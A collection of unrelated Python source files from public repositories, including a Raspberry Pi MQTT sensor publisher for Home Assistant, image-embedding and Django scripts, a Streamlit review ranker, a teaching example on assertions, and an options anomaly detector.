log.info(\"Connect callback RC: \" + str(rc))\n\n if rc==0:\n log.info(\"Connected\")\n client.connected_flag = True\n log.info(\"Sending initial data on connect\")\n\n configure_device()\n update_sensors()\n\n log.info(\"Sent initial data on connect\")\n else:\n log.info(\"Bad connection\")\n client.connected_flag = False\n\ndef on_disconnect(client, userdata, rc):\n log.info(\"Disconnected\") \n client.connected_flag = False\n\nclient = mqtt.Client()\nclient.username_pw_set(broker_user, broker_pass)\nclient.on_connect = on_connect \nclient.on_disconnect = on_disconnect\n\nclass 
ProgramKilled(Exception):\n pass\n\ndef signal_handler(signum, frame):\n client.disconnect()\n raise ProgramKilled\n\nclass Job(threading.Thread):\n def __init__(self, interval, execute, *args, **kwargs):\n threading.Thread.__init__(self)\n self.daemon = False\n self.stopped = threading.Event()\n self.interval = interval\n self.execute = execute\n self.args = args\n self.kwargs = kwargs\n \n def stop(self):\n self.stopped.set()\n self.join()\n def run(self):\n while not self.stopped.wait(self.interval.total_seconds()):\n self.execute(*self.args, **self.kwargs)\n\ndef utc_from_timestamp(timestamp: float) -> dt.datetime:\n \"\"\"Return a UTC time from a timestamp.\"\"\"\n return UTC.localize(dt.datetime.utcfromtimestamp(timestamp))\n\ndef as_local(dattim: dt.datetime) -> dt.datetime:\n \"\"\"Convert a UTC datetime object to local time zone.\"\"\"\n if dattim.tzinfo == DEFAULT_TIME_ZONE:\n return dattim\n if dattim.tzinfo is None:\n dattim = UTC.localize(dattim)\n\n return dattim.astimezone(DEFAULT_TIME_ZONE)\n\ndef get_last_boot():\n return str(as_local(utc_from_timestamp(psutil.boot_time())).isoformat())\n\ndef update_sensors():\n if not client.connected_flag:\n log.info(\"Publishing device status skipped: not connected\")\n return\n\n log.info(\"Publishing device status\")\n\n mounts = {}\n \n for pair in trackedMounts.split(\";\"):\n mountConf = pair.split(\":\")\n mountPath = mountConf[1]\n mountName = mountConf[0]\n \n mounts[mountName] = get_disk_usage(mountPath)\n\n\n client.publish(\n topic=get_state_topic(), \n payload=json.dumps({\n \"temperature\": get_temp(),\n \"disk_use\": mounts,\n \"memory_use\": get_memory_usage(),\n \"cpu_usage\": get_cpu_usage(),\n \"power_status\": get_rpi_power_status(),\n \"power_status_value\": get_rpi_power_status_value(),\n \"last_boot\": get_last_boot(),\n }),\n qos=1, retain=False\n )\n\n log.info(\"Publishing device status done\")\n\ndef get_temp():\n temp = check_output([VCGENCMD,\"measure_temp\"]).decode(\"UTF-8\")\n return str(findall(\"\\d+\\.\\d+\",temp)[0])\n\ndef get_model():\n model = check_output([\"cat\", MODEL_PATH]).decode(\"UTF-8\")\n return str(model)\n\n\ndef get_disk_usage(mountPath):\n return str(psutil.disk_usage(mountPath).percent)\n\ndef get_memory_usage():\n return str(psutil.virtual_memory().percent)\n\ndef get_cpu_usage():\n return str(psutil.cpu_percent(interval=None))\n\ndef get_rpi_power_status_value():\n _throttled = open(SYSFILE, 'r').read()[:-1]\n _throttled = _throttled[:4]\n \n return _throttled\n\ndef get_rpi_power_status():\n _throttled = get_rpi_power_status_value()\n\n if _throttled == '0':\n return 'OK'\n elif _throttled == '1000':\n return 'Undervoltage'\n elif _throttled == '2000':\n return 'Throttling due to power outage'\n elif _throttled == '3000':\n return 'Throttling due to power outage'\n elif _throttled == '4000':\n return 'Heavy throttling due to power outage'\n elif _throttled == '5000':\n return 'Heavy throttling due to power outage'\n elif _throttled == '8000':\n return 'Overheating'\n else:\n return 'Unable to get power status'\n\ndef get_state_topic():\n return \"homeassistant/sensor/\"+ deviceName +\"/state\"\n\ndef configure_device(): \n if not client.connected_flag:\n log.info(\"Publishing device config skipped: not connected\")\n return\n\n log.info(\"Publishing device config\")\n\n deviceInfo = {\n \"identifiers\": [deviceName],\n \"name\": deviceName,\n \"manufacturer\": \"Raspberry PI Foundation\",\n \"model\": get_model()\n }\n \n client.publish(\n topic=\"homeassistant/sensor/\"+ 
deviceName +\"/temperature/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_temperature\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Temperature\",\n \"icon\": \"mdi:coolant-temperature\",\n \"state_topic\": get_state_topic(),\n \"device_class\": \"temperature\",\n \"unit_of_measurement\": \"°C\", \n \"value_template\": \"{{ value_json.temperature}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n for pair in trackedMounts.split(\";\"):\n mountConf = pair.split(\":\")\n mountPath = mountConf[1]\n mountName = mountConf[0]\n\n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/disk_usage_\"+mountName+\"/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_disk_usage_\" + mountName,\n \"device\": deviceInfo,\n \"name\": deviceName + \" Disk Usage (\" + mountName + \")\",\n \"icon\": \"mdi:harddisk\",\n \"state_topic\": get_state_topic(),\n \"unit_of_measurement\": \"%\", \n \"value_template\": \"{{ value_json.disk_use.\"+mountName+\"}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n \n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/memory_usage/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_memory_usage\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Memory Usage\",\n \"icon\": \"mdi:memory\",\n \"state_topic\": get_state_topic(),\n \"unit_of_measurement\": \"%\", \n \"value_template\": \"{{ value_json.memory_use}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/cpu_usage/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_cpu_usage\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Cpu Usage\",\n \"icon\": \"mdi:cpu-64-bit\",\n \"state_topic\": get_state_topic(),\n \"unit_of_measurement\": \"%\", \n \"value_template\": \"{{ value_json.cpu_usage}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/power_status/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_power_status\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Power Status\",\n \"icon\": \"mdi:power-plug\",\n \"state_topic\": get_state_topic(),\n \"value_template\": \"{{ value_json.power_status}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/power_status_value/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_power_status_value\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Power Status (Numeric)\",\n \"icon\": \"mdi:power-plug\",\n \"state_topic\": get_state_topic(),\n \"value_template\": \"{{ value_json.power_status_value}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/last_boot/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_last_boot\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Last Boot\",\n \"icon\": \"mdi:clock\",\n \"state_topic\": get_state_topic(),\n \"device_class\": \"timestamp\",\n \"value_template\": \"{{ value_json.last_boot}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n log.info(\"Publishing device config done\")\n\ndef dumper(obj):\n try:\n return obj.toJSON()\n except:\n return obj.__dict__\n\nif 
__name__ == \"__main__\":\n    log.info(\"Initializing signals\")\n\n    signal.signal(signal.SIGTERM, signal_handler)\n    signal.signal(signal.SIGINT, signal_handler)\n\n    log.info(\"Trying to connect: host \" + str(broker_url) + \" port \" + str(broker_port))\n\n    client.connect(broker_url, port=broker_port, keepalive=60)\n    \n    log.info(\"Continue configuration\")\n\n    device = Job(interval=timedelta(seconds=60 * 10), execute=configure_device)\n    sensors = Job(interval=timedelta(seconds=WAIT_TIME_SECONDS), execute=update_sensors)\n\n    device.start()\n    sensors.start()\n\n    log.info(\"Jobs started\")\n    log.info(\"Starting loop\")\n\n    try:\n        # loop_forever() blocks; ProgramKilled is raised from the signal\n        # handler in this main thread once the client has been disconnected.\n        client.loop_forever()\n    except ProgramKilled:\n        log.info(\"Stopping\")\n        sys.stdout.flush()\n        device.stop()\n        sensors.stop()\n    \n","repo_name":"scaytrase/vgencmd-mqtt-publisher","sub_path":"publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":10880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
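configure_device and update_sensors above follow Home Assistant's MQTT discovery convention: publish a retained config document per sensor, then publish state as JSON to a shared state topic. A minimal sketch of that pattern with paho-mqtt (broker address and device name are placeholders):

```python
import json
import paho.mqtt.client as mqtt

client = mqtt.Client()
client.connect("localhost", 1883)  # placeholder broker
client.loop_start()                # background network loop so QoS 1 completes

device = "demo-pi"
state_topic = f"homeassistant/sensor/{device}/state"

# Retained discovery document: Home Assistant creates the entity from this.
client.publish(
    f"homeassistant/sensor/{device}/temperature/config",
    json.dumps({
        "unique_id": f"{device}_temperature",
        "name": f"{device} Temperature",
        "state_topic": state_topic,
        "unit_of_measurement": "°C",
        "value_template": "{{ value_json.temperature }}",
    }),
    qos=1, retain=True,
).wait_for_publish()

# State document matching the value_template above.
client.publish(state_topic, json.dumps({"temperature": 42.0}), qos=1).wait_for_publish()

client.loop_stop()
client.disconnect()
```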
 +{"seq_id":"3973715117","text":"class Cage:\n    \"\"\"This class describes one cell\"\"\"\n    temperature = None\n    material = None\n    mass = None\n    upd_q = None\n    saved_q = None\n    dx = 10 ** (-3)\n    S = 10 ** (-6)\n    t_0 = 10 ** (-3)\n\n    def interaction(self, *cell_list):\n        for i in range(len(cell_list)):\n            self.upd_q += 0.5 * (self.material.conductivity + cell_list[i].material.conductivity) * (\n                    self.temperature - cell_list[i].temperature) / Cage.dx * Cage.t_0 * Cage.S\n            if round(self.temperature, 1) == self.material.trans_temperature and self.material != cell_list[i].material:\n                self.saved_q += abs(self.upd_q) * 10\n                self.upd_q = 0\n                if self.saved_q >= self.material.fusion * self.mass:\n                    self.material = cell_list[i].material\n                    self.saved_q = 0\n\n    def change_temp(self):\n        self.temperature -= self.upd_q / (self.material.capacity * self.mass)\n        self.upd_q = 0\n\n    def __init__(self, temperature=None, material=None):\n        self.temperature = temperature\n        self.material = material\n        self.mass = material.density * Cage.S * Cage.dx\n        self.upd_q = 0\n        self.saved_q = 0\n\n","repo_name":"kirillis/ice-project","sub_path":"Cell_version_2/Test_Cage.py","file_name":"Test_Cage.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41035714662","text":"import os\n\nimport pandas as pd\nimport torch\nimport transformers\nfrom PIL import Image\nfrom tqdm.contrib import tzip\nfrom transformers import AutoImageProcessor, AutoModel\n\ntransformers.logging.set_verbosity_error()\n\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n\ncub_200_names_file = '../shared/cub-200-folder-names.txt'\nlatin_names_file = '../shared/latin_names.txt'\n\ndata_source = 'cub-200'\n# data_source = 'botw'\n\nroot_directory = '../botw_data/MEDIA/Images' if data_source == 'botw' else '../CUB_200_2011/images'\n\n# 'microsoft/resnet-34', 'microsoft/focalnet-tiny'\nused_models = ['google/vit-base-patch16-224-in21k']\n\n\ndef readfile(path):\n    with open(path, 'r') as f:\n        return f.read().splitlines()\n\n\ndef store_as_csv(embedding_dict, path):\n    embedding_dim = len(list(embedding_dict.values())[0])\n\n    columns = [f'Neuron_{x + 1}' for x in range(embedding_dim)]\n    df = pd.DataFrame.from_dict(embedding_dict, orient='index', columns=columns)\n\n    df.reset_index(inplace=True)\n    df.rename(columns={'index': 'species'}, inplace=True)\n\n    df.to_csv(path, index=False)\n\n\ndef get_image_embeddings(image, model, preprocessor):\n    image = preprocessor(images=image, return_tensors=\"pt\").to(device)\n    outputs = model(**image)\n\n    return outputs.pooler_output.squeeze().detach().cpu().numpy()\n\n\ndef get_mean_embeddings(model, preprocessor, root_dir, folder_names, save_names):\n    mean_embeddings = {}\n\n    for folder, save_name in tzip(folder_names, save_names):\n        subdirectory = os.path.join(root_dir, folder)\n        class_files = os.listdir(subdirectory)\n\n        class_embeddings = []\n\n        for img_path in class_files:\n            file_path = os.path.join(subdirectory, img_path)\n            image = Image.open(file_path).convert('RGB')\n\n            embedding = get_image_embeddings(image, model, preprocessor)\n\n            class_embeddings.append(embedding)\n\n        mean_embedding = sum(class_embeddings) / len(class_embeddings)\n\n        mean_embeddings[save_name] = mean_embedding\n\n    return mean_embeddings\n\n\nlatin_names = readfile(latin_names_file)\n# latin_names is already a list of lines; readfile() expects a file path.\nfolder_names = latin_names if data_source == 'botw' else readfile(cub_200_names_file)\n\nfor model_name in used_models:\n    proc = AutoImageProcessor.from_pretrained(model_name)\n    mod = AutoModel.from_pretrained(model_name).to(device)\n\n    class_reps = get_mean_embeddings(mod, proc, root_directory, folder_names, latin_names)\n    store_as_csv(class_reps, f'Image/{model_name.replace(\"/\", \"-\").split(\"-\")[1]}-{data_source}.csv')\n","repo_name":"hubanton/Cub-200-Scripts","sub_path":"Embeddings/image-embeddings.py","file_name":"image-embeddings.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42168583889","text":"#-*- coding:utf-8 -*-\r\nfrom django.conf.urls import patterns, include, url\r\nfrom view.view import v_index,v_help,v_test\r\nfrom app.userApp.views import v_logout,v_register,v_visit\r\nfrom app.activityApp.views import v_create\r\nfrom app.qrcodeApp.utils import qr_per\r\n\r\n# API endpoints\r\n#from view.api import api_login\r\n# Uncomment the next two lines to enable the admin:\r\n\r\nfrom django.contrib import admin\r\nadmin.autodiscover()\r\n\r\nurlpatterns = patterns('',\r\n    url(r'^$',v_index),\r\n    url(r'^myspace/',include('app.userApp.urls')),\r\n    url(r'^u(\\d+)/$',v_visit),\r\n    url(r'^show/',include('app.activityApp.urls')),\r\n    url(r'^friend/',include('app.friendApp.urls')),\r\n    url(r'^create/$',v_create,name=\"activity_create\"),\r\n    url(r'^login/$', 'django.contrib.auth.views.login', \\\r\n        {'template_name': 'login.tpl'}, name='logon'),\r\n    url(r'^logout/$',v_logout),\r\n    url(r'^help/$',v_help),\r\n    url(r'^register/$',v_register,name=\"register\"),\r\n    #test\r\n    url(r'^test/$',v_test),\r\n\r\n    url(r'^static/qrcode',qr_per),\r\n#    url(r'^rejson/$',rejson),\r\n    # Examples:\r\n    # url(r'^$', 'Aike.views.home', name='home'),\r\n    # url(r'^Aike/', include('Aike.foo.urls')),\r\n\r\n    # Uncomment the admin/doc line below to enable admin documentation:\r\n    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\r\n\r\n    # Uncomment the next line to enable the admin:\r\n    url(r'^admin/', include(admin.site.urls)),\r\n)\r\n\r\n# API URL patterns\r\nurlpatterns += patterns('',\r\n    # used for login\r\n    url(r'^api/',include('app.apiApp.urls')),\r\n    )\r\n","repo_name":"Linktime/Aike","sub_path":"Aike/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
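get_mean_embeddings above averages every image embedding in a class folder into one class vector. The same step, reduced to plain numpy so it runs without any model download (names are mine):

```python
import numpy as np

def mean_embedding(vectors):
    """Average a list of equal-length embedding vectors into one class vector."""
    stacked = np.stack(vectors)   # shape: (n_images, dim)
    return stacked.mean(axis=0)   # shape: (dim,)

class_vectors = [np.array([1.0, 2.0]), np.array([3.0, 4.0])]
print(mean_embedding(class_vectors))  # [2. 3.]
```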
constants import ASPECTS, FILENAME\n\n\nraw_data = pd.read_csv(FILENAME)\nanalyzer = AspectSentimentAnalyzer()\n\ndef get_rank_list(options): # the options are sensitive to order\n    # call model to get the ranks\n    # input: ordered aspects\n    # output: ranked object ids\n    objects = analyzer.get_ranking_by_aspect(options)\n    # st.dataframe(objects)\n    return objects\n\ndef display_ranked_list(objects):\n    # inputs: object ids\n    # outputs: dataframe for display\n    display_cols = [\"Clothing ID\",\"Rating\",\"Positive Feedback Count\", \"Division Name\",\"Department Name\",\"Class Name\", \"combined_score\"]\n    show_data = objects.merge(raw_data, how='inner')[display_cols] \\\n        .groupby(\"Clothing ID\", as_index=False) \\\n        .agg({\"Rating\": \"mean\", \"Positive Feedback Count\": \"mean\", \"Division Name\": \"unique\", \"Department Name\": 'unique', 'Class Name':'unique', \"combined_score\": \"unique\"}) \\\n        .sort_values(by='combined_score', ascending=False)\n    return show_data.set_index(\"Clothing ID\")\n\nclass SemanticCompare:\n    def build_title(self):\n        return st.title(\"Guess What You Like\")\n    def build_input(self, options):\n        sentences = get_rank_list(options)\n        display = display_ranked_list(sentences)\n        return st.dataframe(display)\n\nclass SemanticComparePage:\n    def build(self):\n        compare = SemanticCompare()\n        compare.build_title()\n        options = st.multiselect(\n            \"Select the aspects you care about the most:\",\n            ASPECTS,\n            ['color', 'comfortable']\n        )\n        compare.build_input(options=options)\n\npage = SemanticComparePage()\npage.build()\n","repo_name":"glorialy/CourseProject","sub_path":"src/review_ui.py","file_name":"review_ui.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
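display_ranked_list above is a groupby/aggregate/sort pipeline. The same shape on a tiny made-up frame instead of the review CSV (all values here are invented):

```python
import pandas as pd

df = pd.DataFrame({
    "Clothing ID": [1, 1, 2, 2],
    "Rating": [5, 3, 4, 4],
    "combined_score": [0.9, 0.9, 0.7, 0.7],
})
ranked = (df.groupby("Clothing ID", as_index=False)
            .agg({"Rating": "mean", "combined_score": "first"})
            .sort_values("combined_score", ascending=False))
print(ranked)  # Clothing ID 1 ranks first with mean rating 4.0
```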
 +{"seq_id":"9283966046","text":"# -*- coding: utf-8 -*-\n\"\"\"\nProgramming Management\n\n- Introduction to Assertions\n- Fixing and debugging some code examples.\n\"\"\"\n\n# ASSERTIONS - a way to do DEFENSIVE PROGRAMMING\n\nnumbers = [1.5, 2.3, 0.7, -0.001, 4.4]\n\ntotal = 0.0\nfor num in numbers:\n    assert num > 0.0, 'Data should only contain positive values'\n    total += num\nprint('total is', total)\n\n\n\n# example of an assertion in a function\ndef calc_bulk_density(mass, volume):\n    '''Return dry bulk density = powder mass / powder volume.'''\n    assert volume > 0, 'Problem with volume data'\n    assert mass > 0, 'Problem with mass data'\n    return mass / volume\n\n\n\ncalc_bulk_density(210, 0)  # deliberately trips the volume assertion\n\n\n\n\n\n\n## HELP ME WITH THIS CODE:\n \ndef sort_for_middle(a,b,c):\n    '''Return the middle value of three\n    Assumes that the values can actually be compared\n    Usage: sort_for_middle(a,b,c). input three values\n    '''\n    values = [a,b,c]\n    values.sort()\n    return values[1]  # the middle element after sorting (values[0] would be the smallest)\n\nhelp(sort_for_middle)\n\nsort_for_middle(4,3,2)\n\n\n\n\n\n\n### CLEAN UP THIS CODE.\n\n# Read this program and try to predict what it does\n# Run it: how accurate was your prediction?\n# Refactor the program to make it more readable.\n\nnum_steps = 10\ncells = 'et cetera et cetera'\nprint(cells)\n\nfor step in range(num_steps):\n    next_cells = ''\n    for j in range(len(cells)):\n        left = cells[j-1]            # j-1 wraps to the end for j == 0\n        right = cells[(j+1)%len(cells)]\n        # a cell becomes '-' when its two neighbours match, '*' otherwise\n        next_cells += '-' if left == right else '*'\n    cells = next_cells\n    print(cells)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"DeisData/python","sub_path":"archived/python-session7.py","file_name":"python-session7.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74112092008","text":"import numpy as np\r\nimport pandas as pd\r\nimport itertools\r\n\r\n\r\nclass anomalyDetector:\r\n    def __init__(self):\r\n        self._atm_delta = [0.4,0.6]\r\n        self._otm_delta = 0.4\r\n        self._itm_delta = 0.6\r\n\r\n        self._params = None\r\n        self._thresh_dic = None\r\n        self._train_contract = None\r\n        self._train_outlier = None\r\n        self._test_contract = None\r\n        self._test_outlier = None\r\n        self._train_performance = None\r\n        self._test_performance = None\r\n\r\n    def compile(self, _type=None, expiry=None, monthly=None, moneyness=None, params=None):\r\n        self._type = _type\r\n        self._expiry = expiry\r\n        self._monthly = monthly\r\n        self._moneyness = moneyness\r\n        self.set_params(params)\r\n\r\n    def set_params(self, params):\r\n        self._thresh_dic = {'volume':np.arange(1,3.1,0.1), 'pcratio':np.arange(0.5,1.6,0.1),\r\n                            'impliedvol':np.arange(0,1,0.1), 'openinterest':np.arange(1,3.1,0.1)}\r\n        assert set(params['variable']).issubset(set(self._thresh_dic.keys())), 'invalid variable name'\r\n        self._params = params\r\n        self._thresh_dic = {k:self._thresh_dic[k] for k in params['variable']}\r\n\r\n    def fit(self, train, win_thresh):\r\n        self._train_contract = self.signal_contract(train)\r\n        self._train_performance = self.optimize_threshold(win_thresh)\r\n    \r\n    def predict(self, test, win_thresh, param_thresh, verbose):\r\n        self._test_contract = self.signal_contract(test)\r\n        self._test_outlier = self.anomaly_dates(self._test_contract, param_thresh)\r\n        test_perform = self.outlier_impact(self._test_contract, self._test_outlier, win_thresh=win_thresh, verbose=False)\r\n        self._test_performance = self.record_to_df([[*test_perform, param_thresh]])\r\n        if verbose:\r\n            return self.outlier_impact(self._test_contract, self._test_outlier, win_thresh=win_thresh, verbose=verbose)\r\n    \r\n\r\n    def evaluate(self, winprob=0.7, topn=1):\r\n        #get top 1 winning probability entries in each group\r\n        performance = self._train_performance\r\n        temp = performance[(performance['outliernum']>1) & (performance['winprob']>winprob)]\r\n        temp = temp.sort_values(['outliernum','winprob'],ascending=[False,False]).groupby('outliernum').head(topn)\r\n        return temp\r\n    \r\n    def signal_contract(self, df):\r\n        \"\"\"\r\n        filter out contracts that act as outlier detectors\r\n        \"\"\"\r\n        df = self.preprocess(df)\r\n        cond = self.type_contract(df) & self.expiry_contract(df) & self.monthly_contract(df) & self.moneyness_contract(df)\r\n        return df[cond]\r\n\r\n    def anomaly_dates(self, df, thresh):\r\n        \"\"\"\r\n        return dates in which variables exceed threshold\r\n        \"\"\"\r\n        grouped = df.groupby('quotedate')\r\n        conditions = []\r\n        variable = 
self._params['variable']\r\n direction = self._params['direction']\r\n window = self._params['window']\r\n volume_operation = self._params['volume_operation']\r\n log_trans = self._params['log_trans']\r\n \r\n for i, v in enumerate(variable):\r\n if v=='volume':\r\n vol_series = grouped['volume'].agg(volume_operation)\r\n vol_series[vol_series==0] = 0.01\r\n if log_trans: vol_series = np.log(vol_series)\r\n vol_rollingmean = vol_series.rolling(window).mean().shift()\r\n vol_rollingstd = vol_series.rolling(window).std().shift()\r\n vol_thresh = vol_rollingmean + vol_rollingstd*thresh[i]\r\n cond = pd.eval('vol_series' + direction[i] + 'vol_thresh') \r\n \r\n if v=='pcratio':\r\n pcr = grouped['pcratio'].first()\r\n cond = pd.eval('pcr' + direction[i] + str(thresh[i])) \r\n \r\n if v=='openinterest':\r\n oi_series = grouped['openinterest'].mean()\r\n if log_trans: oi_series = np.log(oi_series)\r\n oi_rollingmean = oi_series.rolling(window,min_periods=1).mean().shift()\r\n oi_rollingstd = oi_series.rolling(window,min_periods=1).std().shift()\r\n oi_thresh = oi_rollingmean + oi_rollingstd*thresh[i]\r\n cond = pd.eval('oi_series' + direction[i] + 'oi_thresh')\r\n \r\n if v=='impliedvol':\r\n iv_series = grouped['impliedvol'].mean()\r\n iv_rolling = iv_series.rolling(window).quantile(thresh[i], interpolation='linear').shift()\r\n cond = pd.eval('iv_series' + direction[i] + 'iv_rolling')\r\n conditions.append(cond)\r\n \r\n dates = pd.concat(conditions, axis=1).all(axis=1)\r\n dates = dates[dates==1].index\r\n return dates\r\n \r\n def outlier_impact(self, df, outlier_date, win_thresh, verbose=True):\r\n price_series = df.groupby('quotedate')['underlying_last'].first()\r\n\r\n outlier_date_index = np.argwhere(np.in1d(price_series.index,outlier_date)).reshape(-1) \r\n next_day_index = np.clip(outlier_date_index + 1, 0, len(price_series)-1)\r\n next_5day_index = np.clip(outlier_date_index + 5, 0, len(price_series)-1)\r\n\r\n a = price_series[outlier_date_index].reset_index(drop=True)\r\n b = price_series[next_day_index].reset_index(drop=True)\r\n c = price_series[next_5day_index].reset_index(drop=True)\r\n \r\n next_day_return = np.log(b/a) \r\n next_5thday_return = np.log(c/a)\r\n avg_5thday_winprob = round((next_5thday_return>win_thresh).mean(),3)\r\n avg_5thday_posreturn = round(next_5thday_return[next_5thday_return>0].mean(),3)\r\n avg_5thday_negreturn = round(next_5thday_return[next_5thday_return<0].mean(),3)\r\n avg_5thday_expreturn = avg_5thday_posreturn*avg_5thday_winprob + avg_5thday_negreturn*(1-avg_5thday_winprob)\r\n \r\n output = pd.concat([a,b,c,next_5thday_return],axis=1)\r\n output.index = outlier_date\r\n output.columns = ['outlierday','nextday','5thday','5thday_return']\r\n\r\n if verbose:\r\n print('+1 day stock price increase probability:', round((next_day_return>win_thresh).mean(),3))\r\n print('+1 day stock price avg increase:', round(next_day_return[next_day_return>0].mean(),3))\r\n print('+1 day stock price avg decrease', round(next_day_return[next_day_return<0].mean(),3),'\\n')\r\n print('+5 day stock price increase probability:', avg_5thday_winprob)\r\n print('+5 day stock price avg increase:', avg_5thday_posreturn)\r\n print('+5 day stock price avg decrease:', avg_5thday_negreturn)\r\n print('+5 day expected return:', avg_5thday_expreturn,'\\n')\r\n return output\r\n \r\n else:\r\n return avg_5thday_winprob, len(output), avg_5thday_posreturn, avg_5thday_negreturn, avg_5thday_expreturn\r\n\r\n def record_to_df(self, record_list):\r\n variable = self._params['variable']\r\n 
performance = pd.DataFrame(record_list, columns=['winprob','outliernum','posret','negret','expret','/'.join(variable)])\r\n return performance\r\n\r\n def optimize_threshold(self, win_thresh):\r\n l = []\r\n for i, thresh in enumerate(itertools.product(*self._thresh_dic.values())):\r\n outlier = self.anomaly_dates(self._train_contract,thresh)\r\n stats = self.outlier_impact(self._train_contract, outlier, win_thresh=win_thresh, verbose=False)\r\n l.append([*stats, np.around(thresh,2)])\r\n if i%500 == 0:\r\n print(f'Testing {i}th combo')\r\n \r\n performance = self.record_to_df(l)\r\n return performance\r\n\r\n ##################################################################################\r\n #------------------------------- helper functions -------------------------------#\r\n ##################################################################################\r\n def pcratio(self, df):\r\n \"\"\"\r\n return put-call ratio by date\r\n \"\"\"\r\n ratio = df[df['type']=='put'].groupby('quotedate')['volume'].sum() / df[df['type']=='call'].groupby('quotedate')['volume'].sum()\r\n ratio.name = 'pcratio'\r\n return ratio\r\n\r\n def preprocess(self, df):\r\n \"\"\"\r\n add pcratio column to df\r\n \"\"\"\r\n pcratio = self.pcratio(df)\r\n return pd.merge(df, pcratio, how='left', left_on='quotedate', right_index=True)\r\n\r\n #contract filters\r\n def no_mask(self, df):\r\n return np.ones(len(df),dtype=bool)\r\n\r\n def type_contract(self, df):\r\n \"\"\"\r\n return call/put filter\r\n \"\"\"\r\n if self._type is None:\r\n return self.no_mask(df)\r\n else:\r\n return df['type']==self._type\r\n\r\n def expiry_contract(self, df):\r\n \"\"\"\r\n return expiry in current/next/3rd month filter\r\n \"\"\"\r\n if self._type is None:\r\n return self.no_mask(df)\r\n else:\r\n expiration, quotedate = df['expiration'], df['quotedate']\r\n expr_month = expiration.dt.year * 12 + expiration.dt.month\r\n quote_month = quotedate.dt.year * 12 + quotedate.dt.month\r\n if self._expiry == 'cur':\r\n return expr_month == quote_month\r\n if self._expiry == 'next':\r\n return expr_month - quote_month == 1\r\n if self._expiry == 'third':\r\n return expr_month - quote_month == 2\r\n\r\n def monthly_contract(self, df):\r\n \"\"\"\r\n return monthly/non-monthly filter\r\n \"\"\"\r\n if self._type is None:\r\n return self.no_mask(df)\r\n else:\r\n expiration= df['expiration']\r\n third_friday = (expiration.dt.day >=15) & (expiration.dt.day <= 21) & (expiration.dt.weekday == 4)\r\n if self._monthly:\r\n return third_friday\r\n else:\r\n return ~third_friday\r\n\r\n def moneyness_contract(self, df):\r\n \"\"\"\r\n return atm/otm/itm filter\r\n \"\"\"\r\n if self._type is None:\r\n return self.no_mask(df)\r\n else:\r\n delta = df['delta']\r\n if self._moneyness == 'atm':\r\n return (abs(delta) >= self._atm_delta[0]) & (abs(delta) <= self._atm_delta[1])\r\n if self._moneyness == 'otm':\r\n return abs(delta) < self._otm_delta\r\n if self._moneyness == 'itm':\r\n return abs(delta) > self._itm_delta","repo_name":"liweidong1218/Trading-tools","sub_path":"Signals/Option anomaly detection/anomaly_detection_class.py","file_name":"anomaly_detection_class.py","file_ext":"py","file_size_in_byte":10474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19269506931","text":"import pandas as pd\nimport numpy as np\nimport os\n\nimport forcing_total\nimport doeclimF\n\nif not os.path.exists('data/'):\n print(\"FATAL ERROR: No data directory\")\n exit()\n\nif not 
